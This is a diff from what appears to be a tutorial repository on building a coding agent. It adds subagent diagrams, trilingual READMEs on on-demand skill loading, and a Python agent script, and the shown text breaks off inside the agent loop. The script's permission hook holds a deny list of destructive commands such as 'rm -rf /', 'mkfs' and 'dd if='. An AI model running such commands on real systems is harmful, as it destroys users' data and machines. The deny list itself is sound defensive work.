messages[] + + + + + + + LLM + + + + tool_use + + + + TOOL_HANDLERS + + + + task → spawn + + + + 基本ツール + bash / read / write / ... + + + + 通常ツール結果 → messages[] + + + + サブエージェント(新規コンテキスト) + + + + messages = [task] + 新規 — 親の会話を継承しない + + + + + + + LLM + + + + 独自の while ループ(最大 30 ラウンド) + bash · read · write · edit · glob + task なし — 再帰 spawn 禁止 + + + + 中間 30+ ラウンドのツール呼び出し + 結果 + すべて破棄 ✗ + + + + ✓ 最後のテキストのみ抽出 → 親に返却 + + + + + ① dispatch + + + + + ② 要約を返却 + + + + + + s05 保持:ループ、フック、todo_write、6 つの基本ツール + + + s06 新規:task ツール + spawn_subagent() — 独立 messages[]、要約のみ返却 + + + + ① 親 → サブ: + task description(短い文字列) + ② サブ → 親: + extract_text()(最終結論のみ) + diff --git a/s06_subagent/images/subagent-overview.svg b/s06_subagent/images/subagent-overview.svg new file mode 100644 index 000000000..48484652e --- /dev/null +++ b/s06_subagent/images/subagent-overview.svg @@ -0,0 +1,121 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + Subagent — 独立 messages[],中间过程全部丢弃 + + + + Parent Agent + + + + messages[] + + + + + + + LLM + + + + tool_use + + + + TOOL_HANDLERS + + + + task → spawn + + + + 基础工具 + bash / read / write / ... + + + + 普通工具结果回到 messages[] + + + + Subagent (全新上下文) + + + + messages = [task] + fresh — 不继承父对话 + + + + + + + LLM + + + + 自己的 while 循环(最多 30 轮) + bash · read · write · edit · glob + 无 task — 禁止递归 spawn + + + + 中间 30+ 轮工具调用 + 结果 + 全部丢弃 ✗ + + + + ✓ 只提取最后一段文本 → 返回给 Parent + + + + + ① dispatch + + + + + ② return 摘要 + + + + + + s05 保留:循环、钩子、todo_write、6 个基础工具 + + + s06 新增:task 工具 + spawn_subagent() — 独立 messages[],只回传摘要 + + + + ① Parent → Sub: + task description(一小段文字) + ② Sub → Parent: + extract_text()(只有最终结论) + diff --git a/s07_skill_loading/README.en.md b/s07_skill_loading/README.en.md new file mode 100644 index 000000000..a21b2d157 --- /dev/null +++ b/s07_skill_loading/README.en.md @@ -0,0 +1,159 @@ +# s07: Skill Loading — Load Only When Needed + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → `s07` → [s08](../s08_context_compact/) → s09 → ... → s19 +> *"Load when needed, don't stuff the prompt"* — Inject via tool_result, not system prompt. +> +> **Harness Layer**: Knowledge — load on demand, don't fill the context. + +--- + +## The Problem + +Your project has a React component spec, a SQL style guide, and an API design doc. You want the Agent to follow these specs automatically. The most straightforward idea — stuff them all into the system prompt: + +```python +SYSTEM = ( + f"You are a coding agent. " + + open("docs/react-style.md").read() # 2000 lines + + open("docs/sql-style.md").read() # 1500 lines + + open("docs/api-design.md").read() # 3000 lines +) +``` + +6500 lines of system prompt. The Agent carries these docs on every LLM call — whether it's changing a CSS color or fixing a SQL query. 99% of the content is irrelevant to the current task, burning tokens for nothing. + +--- + +## The Solution + +![Skill Overview](images/skill-overview.en.svg) + +s06's loop, hooks, TODO, and sub-Agent are all preserved. The only change: at startup, inject the skill catalog into the SYSTEM prompt; at runtime, register one more tool `load_skill` (loads full content, spends tokens only when used). + +Two-level design: + +| Level | Location | Timing | Cost | +|-------|----------|--------|------| +| 1. Catalog | system prompt | Injected at startup (harness scans skills/) | ~100 tokens/skill, carried every turn | +| 2. Content | tool_result | When Agent calls load_skill | ~2000 tokens/skill, on demand | + +The loop changes not one line. `load_skill` auto-dispatches via `TOOL_HANDLERS[block.name]`. + +--- + +## How It Works + +**skills/ directory** — one subdirectory per skill, each containing a `SKILL.md` file: + +``` +skills/ + agent-builder/SKILL.md + code-review/SKILL.md + mcp-builder/SKILL.md + pdf/SKILL.md +``` + +**Level 1: Inject catalog at startup** — the harness scans the skills/ directory and writes each skill's name and one-line description into the SYSTEM prompt. The Agent sees "which skills I have available" every turn, with no extra API calls: + +```python +def build_system() -> str: + catalog = list_skills() # scan skills/ dir + return ( + f"You are a coding agent at {WORKDIR}. " + f"Skills available:\n{catalog}\n" + "Use load_skill to get full details when needed." + ) + +SYSTEM = build_system() # runs once at startup +``` + +**Level 2: load_skill** — the Agent decides "I need the SQL style guide" and calls `load_skill("sql-style")`. The content is injected via `tool_result`, exactly like reading a file: + +```python +def load_skill(name: str) -> str: + manifest = SKILLS_DIR / name / "SKILL.md" + if not manifest.exists(): + return f"Skill not found: {name}" + return manifest.read_text() +``` + +The key distinction: skill content is injected via `tool_result`, **not system prompt**. The Agent sees the content in the current conversation turn, but it's not automatically carried to the next LLM call. Reload if needed. + +It's like not keeping three reference books spread open on your desk at all times — you keep them on the shelf and pull one out when you need it. + +--- + +## Changes from s06 + +| Component | Before (s06) | After (s07) | +|-----------|-------------|-------------| +| Tool count | 7 (bash, read, write, edit, glob, todo_write, task) | 8 (+load_skill) | +| Knowledge loading | None | Two-level: startup catalog in SYSTEM + runtime load_skill | +| SYSTEM prompt | Static string | Startup scan of skills/ injects catalog | +| Loop | Unchanged | Unchanged (skill tool auto-dispatches) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s07_skill_loading/code.py +``` + +Try these prompts: + +1. `What skills are available?` (should answer directly from the SYSTEM prompt catalog, no tool call) +2. `Load the code-review skill and follow its instructions` (should call load_skill) +3. `I need to do a code review -- load the relevant skill first` + +What to watch for: Does the Agent know which skills are available directly from the SYSTEM catalog? Does it proactively call `load_skill` when it needs specific specs? Does the full skill content appear in the system prompt? + +--- + +## What's Next + +On-demand loading solved "don't carry what you shouldn't." But another problem looms — **how to drop what you should**. After the Agent works for 30 minutes, the messages list fills up with intermediate process. Old tool_results, stale file contents — occupying context but adding no value. + +→ s08 Context Compact: A four-layer compaction strategy. Cheap layers run first, expensive layers run last. + +
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `loadSkillsDir.ts` (1087 lines), `SkillTool.ts`, `bundledSkills.ts`. + +### 1. Skill Sources: Not Just One skills/ Directory + +The teaching version assumes all skills live in a `skills/` directory. CC actually loads from 10 sources (`loadSkillsDir.ts:638-1058`): managed/policy skills, user skills (`~/.claude/skills/`), project skills (`.claude/skills/`), `--add-dir` skills, legacy commands (`.claude/commands/`), dynamic skills, conditional skills, bundled skills, plugin skills, MCP skills. + +### 2. SKILL.md Frontmatter — Complete Fields + +CC's SKILL.md YAML frontmatter (`loadSkillsDir.ts:185-265`) has 16 fields: + +| Field | Purpose | +|-------|---------| +| `name` / `description` | Display name and description | +| `when_to_use` | Guides the model on when to invoke | +| `allowed-tools` | Auto-allow list of tools available to the skill | +| `context` | `inline` (default) or `fork` (run as sub-Agent) | +| `model` | Model override (haiku/sonnet/opus/inherit) | +| `hooks` | Skill-level hook configuration | +| `paths` | Glob patterns for conditional activation | +| `user-invocable` | Users can invoke via `/name` | + +### 3. Precise Implementation of Two-Level Loading + +1. **Catalog (at startup)**: `getSkillDirCommands()` scans directory → registers as `Command` objects containing only metadata. `getSkillListingAttachments()` formats the skill list as attachments, budgeted at ~1% of the context window (cap 8000 characters). +2. **Load (on invocation)**: Model calls `Skill` tool → `getPromptForCommand()` expands full SKILL.md content → injected into conversation via tool_result's `newMessages`. + +### The Teaching Version's Simplification Is Intentional + +- 10 sources → 1 `skills/` directory: sufficient to demonstrate the core concept of two-level loading +- 16 frontmatter fields → only read first line as description: reduces parsing complexity +- Forked skills (`context: 'fork'`) → omitted: sub-Agent skill injection deferred to s13 + +
+ + diff --git a/s07_skill_loading/README.ja.md b/s07_skill_loading/README.ja.md new file mode 100644 index 000000000..8235e0eda --- /dev/null +++ b/s07_skill_loading/README.ja.md @@ -0,0 +1,159 @@ +# s07: Skill Loading — 必要なときにだけ読み込む + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → `s07` → [s08](../s08_context_compact/) → s09 → ... → s19 +> *"Load when needed, don't stuff the prompt"* — tool_result で注入、system prompt には詰め込まない。 +> +> **Harness レイヤー**: 知識 — 必要に応じて読み込み、コンテキストに詰め込まない。 + +--- + +## 課題 + +プロジェクトには React コンポーネント仕様、SQL スタイルガイド、API 設計ドキュメントがある。Agent にこれらの仕様を自動的に守らせたい。最も直接的な方法 — すべて system prompt に詰め込む: + +```python +SYSTEM = ( + f"You are a coding agent. " + + open("docs/react-style.md").read() # 2000 行 + + open("docs/sql-style.md").read() # 1500 行 + + open("docs/api-design.md").read() # 3000 行 +) +``` + +6500 行の system prompt。Agent は LLM を呼び出すたびにこれらのドキュメントを運ぶ — CSS の色を変えるときも SQL クエリを修正するときも。99% の内容が現在のタスクと無関係で、トークンを無駄に消費する。 + +--- + +## ソリューション + +![Skill Overview](images/skill-overview.ja.svg) + +s06 のループ、フック、TODO、サブ Agent はすべて維持される。唯一の変更:起動時にスキルカタログを SYSTEM prompt に注入し、実行時に新しいツール `load_skill` を登録する(完全な内容を読み込み、使ったときだけトークンを消費)。 + +2 層設計: + +| 層 | 場所 | タイミング | コスト | +|---|------|-----------|--------| +| 1. カタログ | system prompt | 起動時に注入(harness が skills/ をスキャン) | ~100 トークン/スキル、毎ターン携帯 | +| 2. 内容 | tool_result | Agent が load_skill を呼び出したとき | ~2000 トークン/スキル、オンデマンド | + +ループは 1 行も変更されない。`load_skill` は `TOOL_HANDLERS[block.name]` を通じて自動的にディスパッチされる。 + +--- + +## 仕組み + +**skills/ ディレクトリ** — スキルごとに 1 つのサブディレクトリ、それぞれに `SKILL.md` ファイルを含む: + +``` +skills/ + agent-builder/SKILL.md + code-review/SKILL.md + mcp-builder/SKILL.md + pdf/SKILL.md +``` + +**第 1 層:起動時にカタログを注入** — harness が skills/ ディレクトリをスキャンし、各スキルの名前と一言の説明を SYSTEM prompt に書き込む。Agent は毎ターン「どのスキルが利用可能か」を確認できる。追加の API 呼び出しは不要: + +```python +def build_system() -> str: + catalog = list_skills() # scan skills/ dir + return ( + f"You are a coding agent at {WORKDIR}. " + f"Skills available:\n{catalog}\n" + "Use load_skill to get full details when needed." + ) + +SYSTEM = build_system() # runs once at startup +``` + +**第 2 層:load_skill** — Agent が「SQL スタイルガイドが必要」と判断し、`load_skill("sql-style")` を呼び出す。内容は `tool_result` を通じて注入される。ファイルを読むのと全く同じ: + +```python +def load_skill(name: str) -> str: + manifest = SKILLS_DIR / name / "SKILL.md" + if not manifest.exists(): + return f"Skill not found: {name}" + return manifest.read_text() +``` + +重要な違い:スキル内容は `tool_result` を通じて注入され、**system prompt ではない**。Agent は現在の会話ターンで内容を見るが、次の LLM 呼び出しには自動的に引き継がれない。必要に応じて再読み込みする。 + +これは、3 冊の参考書を常に机の上に広げておくのではなく、本棚に置いて必要な本を取り出すようなものだ。 + +--- + +## s06 からの変更点 + +| コンポーネント | 変更前 (s06) | 変更後 (s07) | +|---------------|-------------|-------------| +| ツール数 | 7 (bash, read, write, edit, glob, todo_write, task) | 8 (+load_skill) | +| 知識読み込み | なし | 2 層:起動時カタログ注入 SYSTEM + 実行時 load_skill | +| SYSTEM プロンプト | 静的文字列 | 起動時に skills/ をスキャンしてカタログ注入 | +| ループ | 変更なし | 変更なし(スキルツールは自動ディスパッチ) | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s07_skill_loading/code.py +``` + +以下のプロンプトを試してみよう: + +1. `What skills are available?`(SYSTEM prompt のカタログから直接回答するはず、ツール呼び出しなし) +2. `Load the code-review skill and follow its instructions`(load_skill を呼び出すはず) +3. `I need to do a code review -- load the relevant skill first` + +観察のポイント:Agent は SYSTEM 内のカタログから利用可能なスキルを知っているか? 具体的な仕様が必要なときに `load_skill` を積極的に呼び出すか? system prompt にスキルの完全な内容が含まれているか? + +--- + +## 次へ + +オンデマンド読み込みで「運ぶべきでないものは運ばない」問題は解決した。しかし別の問題が待っている — **捨てるべきものをどう捨てるか**。Agent が 30 分連続で作業すると、messages リストが中間プロセスで埋め尽くされる。古い tool_result、期限切れのファイル内容 — コンテキストを占領しているが価値を生まない。 + +→ s08 Context Compact:4 層圧縮戦略。安価な層を先に実行、高価な層を後に実行。 + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `loadSkillsDir.ts`(1087 行)、`SkillTool.ts`、`bundledSkills.ts` の完全分析に基づく。 + +### 一、スキルソース:skills/ ディレクトリだけではない + +教育版はすべてのスキルが `skills/` ディレクトリにあると想定している。CC は実際には 10 のソースから読み込む(`loadSkillsDir.ts:638-1058`):managed/policy skills、user skills(`~/.claude/skills/`)、project skills(`.claude/skills/`)、`--add-dir` skills、legacy commands(`.claude/commands/`)、dynamic skills、conditional skills、bundled skills、plugin skills、MCP skills。 + +### 二、SKILL.md Frontmatter — 完全なフィールド + +CC の SKILL.md YAML frontmatter(`loadSkillsDir.ts:185-265`)には 16 のフィールドがある: + +| フィールド | 用途 | +|-----------|------| +| `name` / `description` | 表示名と説明 | +| `when_to_use` | モデルにいつ呼び出すかを指導 | +| `allowed-tools` | スキルが使用可能なツールの自動許可リスト | +| `context` | `inline`(デフォルト)または `fork`(サブ Agent として実行) | +| `model` | モデルオーバーライド(haiku/sonnet/opus/inherit) | +| `hooks` | スキルレベルのフック設定 | +| `paths` | 条件付きアクティベーションの glob パターン | +| `user-invocable` | ユーザーが `/name` で呼び出し可能 | + +### 三、2 層読み込みの正確な実装 + +1. **カタログ(起動時)**:`getSkillDirCommands()` がディレクトリをスキャン → メタデータのみを含む `Command` オブジェクトとして登録。`getSkillListingAttachments()` がスキルリストを添付ファイルとしてフォーマット、コンテキストウィンドウの ~1% を予算とする(上限 8000 文字)。 +2. **読み込み(呼び出し時)**:モデルが `Skill` ツールを呼び出す → `getPromptForCommand()` が完全な SKILL.md 内容を展開 → tool_result の `newMessages` を通じて会話に注入。 + +### 教育版の単純化は意図的 + +- 10 のソース → 1 つの `skills/` ディレクトリ:2 層読み込みの核心概念を示すのに十分 +- 16 の frontmatter フィールド → 最初の行だけを説明として読み取り:解析の複雑さを削減 +- forked skills(`context: 'fork'`)→ 省略:サブ Agent のスキル注入は s13 に委ねる + +
+ + diff --git a/s07_skill_loading/README.md b/s07_skill_loading/README.md new file mode 100644 index 000000000..2b2a43059 --- /dev/null +++ b/s07_skill_loading/README.md @@ -0,0 +1,159 @@ +# s07: Skill Loading — 用到的时候才加载 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → s06 → `s07` → [s08](../s08_context_compact/) → s09 → ... → s19 +> *"用到时再加载, 别全塞 prompt 里"* — 通过 tool_result 注入, 不塞 system prompt。 +> +> **Harness 层**: 知识 — 按需加载, 不堆满上下文。 + +--- + +## 问题 + +你的项目有一套 React 组件规范、一份 SQL 风格指南、一份 API 设计文档。你希望 Agent 自动遵守这些规范。最直接的想法——全塞进 system prompt: + +```python +SYSTEM = ( + f"You are a coding agent. " + + open("docs/react-style.md").read() # 2000 行 + + open("docs/sql-style.md").read() # 1500 行 + + open("docs/api-design.md").read() # 3000 行 +) +``` + +6500 行 system prompt。Agent 每次调用 LLM 都带着这些文档——不管是在改 CSS 颜色还是修 SQL 查询。99% 的内容和当前任务无关,白白消耗 token。 + +--- + +## 解决方案 + +![Skill Overview](images/skill-overview.svg) + +s06 的循环、钩子、TODO、子 Agent 全部保留。唯一的变化:启动时把技能目录注入 SYSTEM prompt,运行时多注册一个工具 `load_skill`(加载完整内容,用到才花 token)。 + +两层设计: + +| 层 | 位置 | 时机 | 代价 | +|---|------|------|------| +| 1. 目录 | system prompt | 启动时注入(harness 扫描 skills/) | ~100 tokens/skill,每轮都带 | +| 2. 内容 | tool_result | Agent 调用 load_skill 时 | ~2000 tokens/skill,按需 | + +循环一行不改。load_skill 自动通过 `TOOL_HANDLERS[block.name]` 分发。 + +--- + +## 工作原理 + +**skills/ 目录**——每个技能一个子目录,包含 `SKILL.md` 文件: + +``` +skills/ + agent-builder/SKILL.md + code-review/SKILL.md + mcp-builder/SKILL.md + pdf/SKILL.md +``` + +**第一级:启动时注入目录**——harness 扫描 skills/ 目录,把每个技能的名字和一句话简介写进 SYSTEM prompt。Agent 每轮都能看到"我有哪些技能可用",不花额外 API 调用: + +```python +def build_system() -> str: + catalog = list_skills() # scan skills/ dir + return ( + f"You are a coding agent at {WORKDIR}. " + f"Skills available:\n{catalog}\n" + "Use load_skill to get full details when needed." + ) + +SYSTEM = build_system() # runs once at startup +``` + +**第二级:load_skill**——Agent 决定"我需要 SQL 风格指南",调用 `load_skill("sql-style")`。内容通过 `tool_result` 注入,和读文件一模一样: + +```python +def load_skill(name: str) -> str: + manifest = SKILLS_DIR / name / "SKILL.md" + if not manifest.exists(): + return f"Skill not found: {name}" + return manifest.read_text() +``` + +关键区别:技能内容通过 `tool_result` 注入,**不是 system prompt**。Agent 在当前对话中看到内容,但下次 LLM 调用时不自动携带。需要的话重新加载。 + +这就像你不会把三本参考书一直摊在桌上——你把它们放在书架上,用到哪本抽哪本。 + +--- + +## 相对 s06 的变更 + +| 组件 | 之前 (s06) | 之后 (s07) | +|------|-----------|-----------| +| 工具数量 | 7 (bash, read, write, edit, glob, todo_write, task) | 8 (+load_skill) | +| 知识加载 | 无 | 两级:启动时目录注入 SYSTEM + 运行时 load_skill | +| SYSTEM 提示 | 静态字符串 | 启动时扫描 skills/ 注入目录 | +| 循环 | 不变 | 不变(skill 工具自动分发) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s07_skill_loading/code.py +``` + +试试这些 prompt: + +1. `What skills are available?`(应该直接从 SYSTEM prompt 里的目录回答,不调工具) +2. `Load the code-review skill and follow its instructions`(应该调 load_skill) +3. `I need to do a code review -- load the relevant skill first` + +观察重点:Agent 是否直接从 SYSTEM 里的目录知道有哪些技能?它在需要具体规范时主动调了 `load_skill` 吗?system prompt 里有没有出现 skill 的完整内容? + +--- + +## 接下来 + +按需加载解决了"不该带的不要带"。但另一个问题来了——**该丢的怎么丢**。Agent 连续工作 30 分钟后,messages 列表塞满了中间过程。旧的 tool_result、过时的文件内容——占着上下文但不产生价值。 + +s08 Context Compact → 四层压缩策略。便宜的先跑,贵的后跑。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `loadSkillsDir.ts`(1087 行)、`SkillTool.ts`、`bundledSkills.ts` 的完整分析。 + +### 一、技能来源:不是只有一个 skills/ 目录 + +教学版假设所有技能在 `skills/` 目录下。CC 实际从 10 个来源加载(`loadSkillsDir.ts:638-1058`):managed/policy skills、user skills(`~/.claude/skills/`)、project skills(`.claude/skills/`)、`--add-dir` skills、legacy commands(`.claude/commands/`)、dynamic skills、conditional skills、bundled skills、plugin skills、MCP skills。 + +### 二、SKILL.md Frontmatter 完整字段 + +CC 的 SKILL.md YAML frontmatter(`loadSkillsDir.ts:185-265`)有 16 个字段: + +| 字段 | 用途 | +|------|------| +| `name` / `description` | 显示名称和描述 | +| `when_to_use` | 指导模型何时调用 | +| `allowed-tools` | 技能可用工具的自动允许列表 | +| `context` | `inline`(默认)或 `fork`(作为子 Agent 运行) | +| `model` | 模型覆盖(haiku/sonnet/opus/inherit) | +| `hooks` | 技能级别的 hook 配置 | +| `paths` | 条件激活的 glob 模式 | +| `user-invocable` | 用户可以通过 `/name` 调用 | + +### 三、两级加载的精确实现 + +1. **Catalog(启动时)**:`getSkillDirCommands()` 扫描目录 → 注册为 `Command` 对象,只包含元数据。`getSkillListingAttachments()` 把技能列表格式化为附件,预算为上下文窗口的 ~1%(上限 8000 字符)。 +2. **Load(调用时)**:模型调 `Skill` 工具 → `getPromptForCommand()` 展开完整 SKILL.md 内容 → 通过 tool_result 的 `newMessages` 注入对话。 + +### 教学版的简化是刻意的 + +- 10 个来源 → 1 个 `skills/` 目录:足以展示两级加载的核心概念 +- 16 个 frontmatter 字段 → 只读第一行作为简介:减少解析复杂度 +- forked skills(`context: 'fork'`)→ 省略:子 Agent 的技能注入留给 s13 + +
+ + diff --git a/s07_skill_loading/code.py b/s07_skill_loading/code.py new file mode 100644 index 000000000..16636c43f --- /dev/null +++ b/s07_skill_loading/code.py @@ -0,0 +1,357 @@ +#!/usr/bin/env python3 +""" +s07: Skill Loading — two-level on-demand knowledge injection. + + Layer 1 (cheap, always present): + SYSTEM prompt includes skill names + one-line descriptions (~100 tokens/skill) + "Skills available: agent-builder, code-review, mcp-builder, pdf" + + Layer 2 (expensive, on demand): + Agent calls load_skill("code-review") → full SKILL.md content + injected via tool_result (~2000 tokens/skill) + + skills/ + agent-builder/SKILL.md + code-review/SKILL.md + mcp-builder/SKILL.md + pdf/SKILL.md + +Changes from s06: + + build_system() — scan skills/ dir at startup, inject catalog into SYSTEM + + load_skill(name) — return full SKILL.md content via tool_result + + SKILLS_DIR config + Loop unchanged: load_skill auto-dispatches via TOOL_HANDLERS. + +Run: python s07_skill_loading/code.py +Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess, json +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +SKILLS_DIR = WORKDIR / "skills" +TASKS_DIR = WORKDIR / ".tasks"; TASKS_DIR.mkdir(exist_ok=True) +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# s07: Skill catalog scan (used by build_system below) +def list_skills() -> str: + """List all skills (name + one-line description).""" + if not SKILLS_DIR.exists(): + return "(no skills directory found)" + skills = [] + for d in sorted(SKILLS_DIR.iterdir()): + if not d.is_dir(): + continue + manifest = d / "SKILL.md" + if manifest.exists(): + name = d.name + desc = manifest.read_text().split("\n")[0].lstrip("#").strip() + skills.append(f"- **{name}**: {desc}") + return "\n".join(skills) if skills else "(no skills found)" + +# s07: SYSTEM includes skill catalog (cheap — just names + descriptions) +def build_system() -> str: + """Build SYSTEM prompt with skill catalog injected at startup.""" + catalog = list_skills() + return ( + f"You are a coding agent at {WORKDIR}. " + f"Skills available:\n{catalog}\n" + "Use load_skill to get full details when needed." + ) + +SYSTEM = build_system() + + +# ═══════════════════════════════════════════════════════════ +# FROM s02-s06 (unchanged): Tool Implementations +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + +def run_todo_write(todos: list) -> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + lines = ["\n\033[33m## Current Tasks\033[0m"] + for t in todos: + icon = {"pending": " ", "in_progress": "\033[36m▸\033[0m", "completed": "\033[32m✓\033[0m"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" + +def extract_text(content) -> str: + if not isinstance(content, list): + return str(content) + return "\n".join(getattr(b, "text", "") for b in content if getattr(b, "type", None) == "text") + + +# ═══════════════════════════════════════════════════════════ +# FROM s06 (unchanged): Subagent +# ═══════════════════════════════════════════════════════════ + +SUB_TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, +] +SUB_HANDLERS = {"bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob} + +def spawn_subagent(description: str) -> str: + print(f"\n\033[35m[Subagent spawned]\033[0m") + messages = [{"role": "user", "content": description}] + for _ in range(30): + response = client.messages.create(model=MODEL, system=SYSTEM, + messages=messages, tools=SUB_TOOLS, max_tokens=8000) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + break + results = [] + for block in response.content: + if block.type == "tool_use": + handler = SUB_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(f" \033[90m[sub] {block.name}: {str(output)[:100]}\033[0m") + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + result = extract_text(messages[-1]["content"]) + print(f"\033[35m[Subagent done]\033[0m") + return result + + +# ═══════════════════════════════════════════════════════════ +# NEW in s07: load_skill — runtime full content loading +# ═══════════════════════════════════════════════════════════ + +def load_skill(name: str) -> str: + """Load full skill content. Injected via tool_result, not system prompt.""" + manifest = SKILLS_DIR / name / "SKILL.md" + if not manifest.exists(): + return f"Skill not found: {name}" + return manifest.read_text() + + +# ═══════════════════════════════════════════════════════════ +# Tool Registry — all tools from s02-s07 +# ═══════════════════════════════════════════════════════════ + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, + {"name": "todo_write", "description": "Create and manage a task list for your current coding session.", + "input_schema": {"type": "object", "properties": {"todos": {"type": "array", "items": {"type": "object", "properties": {"content": {"type": "string"}, "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}}}}}}}, + {"name": "task", "description": "Launch a subagent to handle a complex subtask. Returns only the final conclusion.", + "input_schema": {"type": "object", "properties": {"description": {"type": "string"}}, "required": ["description"]}}, + # s07: skill tool (catalog is already in SYSTEM prompt, this loads full content) + {"name": "load_skill", "description": "Load the full content of a skill by name.", + "input_schema": {"type": "object", "properties": {"name": {"type": "string"}}, "required": ["name"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, "todo_write": run_todo_write, + "task": spawn_subagent, "load_skill": load_skill, +} + + +# ═══════════════════════════════════════════════════════════ +# FROM s04 (unchanged): Hook System +# ═══════════════════════════════════════════════════════════ + +HOOKS = {"UserPromptSubmit": [], "PreToolUse": [], "PostToolUse": [], "Stop": []} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: + return result + return None + +DENY_LIST = ["rm -rf /", "sudo", "shutdown", "reboot", "mkfs", "dd if="] + +def permission_hook(block): + if block.name == "bash": + for p in DENY_LIST: + if p in block.input.get("command", ""): + print(f"\n\033[31m⛔ Blocked: '{p}'\033[0m") + return "Permission denied" + return None + +def log_hook(block): + print(f"\033[90m[HOOK] {block.name}\033[0m") + return None + +def context_inject_hook(query: str): + print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m") + return None + +def summary_hook(messages: list): + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None + +register_hook("UserPromptSubmit", context_inject_hook) +register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("Stop", summary_hook) + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — same as s05-s06 + nag reminder +# ═══════════════════════════════════════════════════════════ + +rounds_since_todo = 0 + +def agent_loop(messages: list): + global rounds_since_todo + while True: + if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) + + response = client.messages.create( + 